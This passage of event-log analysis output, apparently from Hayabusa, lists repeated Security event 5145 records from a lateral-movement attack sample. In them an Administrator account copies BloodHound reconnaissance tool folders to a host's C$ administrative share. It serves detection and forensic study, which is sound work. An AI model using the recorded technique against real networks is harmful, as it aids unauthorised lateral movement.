Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\static | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.718 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\invariant | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\isarray | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.728 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-obj | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\is-zip-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.738 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\external\sizzle | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\ajax | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.748 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\attributes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 